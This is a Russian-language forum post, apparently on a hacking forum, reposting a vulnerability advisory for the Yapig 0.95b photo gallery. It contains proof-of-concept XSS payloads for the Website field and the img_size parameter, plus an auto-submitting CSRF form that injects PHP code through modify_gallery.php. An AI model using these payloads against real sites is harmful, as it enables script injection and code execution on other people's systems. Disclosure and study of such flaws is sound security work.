• XSS.stack #1 – первый литературный журнал от юзеров форума

Yapig

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
Межсайтовый скриптинг и PHP-инклюдинг в Yapig 0.95b и более ранние версии
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей, а также выполнить произвольный PHP сценарий на системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в поле Website формы Homepage. Пример:
Код:
"><script>alert('hi')</script>

2. Уязвимость существует при обработке параметра img_size в сценарии view.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Для успешной эксплуатации уязвимости должна быть включена опция register_globals Пример:
Код:
http://your-server/path-to-yapig/view.php?gid=1&phid=1&img_size=><script>alert('hi')</script>

3. Удаленный пользователь может c помощью специально сформированной формы внедрить и выполнить произвольный PHP сценарий на целевой системе. Для удачной эксплуатации уязвимости требуется участие пользователя с административными привилегиями в приложении. Пример:

Код:
<form method="post" action="http://your-server/path-to-yapig/yapig095b/modify_gallery.php?action=mod_info&amp;gid=1">
<input value='TestGallery"; echo "evil' name="title" type="text">
<input value="TestAuthor" name="author" type="text">
<input value="TestDate" name="date" type="text">
<input value="" name="dir" type="text">
<input value="TestDescription" name="desc" type="text">
<input type="submit">
</form>

<script type="text/javascript">
document.forms[0].submit();
</script>

:zns2: Производитель
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх